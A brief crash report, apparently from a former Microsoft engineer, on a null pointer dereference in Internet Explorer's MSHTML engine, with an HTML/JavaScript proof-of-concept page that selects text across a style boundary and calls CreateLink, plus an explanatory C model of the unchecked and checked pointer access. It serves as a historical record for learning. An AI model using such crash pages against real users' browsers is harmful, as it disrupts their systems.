A brief crash report. Calling execCommand("CreateLink") on a text range that spanned both styled and unstyled text triggered a null pointer dereference in MSHTML!CBaseCharCommand::IsSimpleStyleContributor.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_execCommand_CreateLink</title>
</head>
<body>
<span style="color:blue">TEXT WITH STYLE</span> TEXT WITHOUT STYLE
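<script language="JavaScript">
// Select text that starts inside the styled <span> and ends in the
// unstyled text after it, then issue CreateLink on that selection.
function main()
{
	var bodyRange = document.body.createTextRange();
	// "STYLE TEXT" crosses the boundary between the span and the plain text.
	bodyRange.findText("STYLE TEXT");
	bodyRange.select();
	// Issue the command after a short delay so the selection is in place.
	setTimeout('document.execCommand("CreateLink", false, "http://www.bing.com");', 100);
}
// Run once the document has loaded.
window.onload = main;
</script>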
</body>
</html>

The crash was classified as PROBABLY_NOT_EXPLOITABLE. The selection had to include text with an inline style immediately adjacent to unstyled text; the CreateLink command then attempted to analyze style contributors across that boundary and dereferenced a null pointer.
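
The null-dereference pattern described above, as an added example in C that is not code from this report or from MSHTML. The Run and Style types, the function names and the choice to treat an unstyled run as contributing no style are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical model of a selection; these are NOT MSHTML's real structures. */
typedef struct { bool simple; } Style;
typedef struct {
    const char  *text;
    const Style *style;   /* NULL for text with no inline style */
} Run;

typedef bool (*ContributorCheck)(const Run *);

/* Crash pattern: assumes every run in the selection carries a style. */
static bool is_simple_unchecked(const Run *r) {
    return r->style->simple;   /* NULL dereference on an unstyled run */
}

/* Hardened form: an unstyled run contributes no style (modelling assumption). */
static bool is_simple_checked(const Run *r) {
    if (r == NULL || r->style == NULL)
        return false;
    return r->style->simple;
}

/* Count the runs in a selection that contribute a simple style. */
static size_t count_simple(const Run *runs, size_t n, ContributorCheck check) {
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        if (check(&runs[i]))
            hits++;
    return hits;
}

/* Constructed sample mirroring the page's markup and its "STYLE TEXT" selection. */
static const Style blue = { true };
static const Run styled_only[] = { { "STYLE", &blue } };
static const Run mixed[]       = { { "STYLE", &blue }, { " TEXT", NULL } };

int main(void) {
    /* A uniformly styled selection never exposes the missing check. */
    printf("styled only, unchecked: %zu\n",
           count_simple(styled_only, 1, is_simple_unchecked));
    /* The selection that crosses the style boundary needs the checked form. */
    printf("mixed, checked: %zu\n", count_simple(mixed, 2, is_simple_checked));
    return 0;
}
```

The unchecked form gives the right answer for every uniformly styled selection, which is why a test case has to cross the style boundary to reach the faulting path.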

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.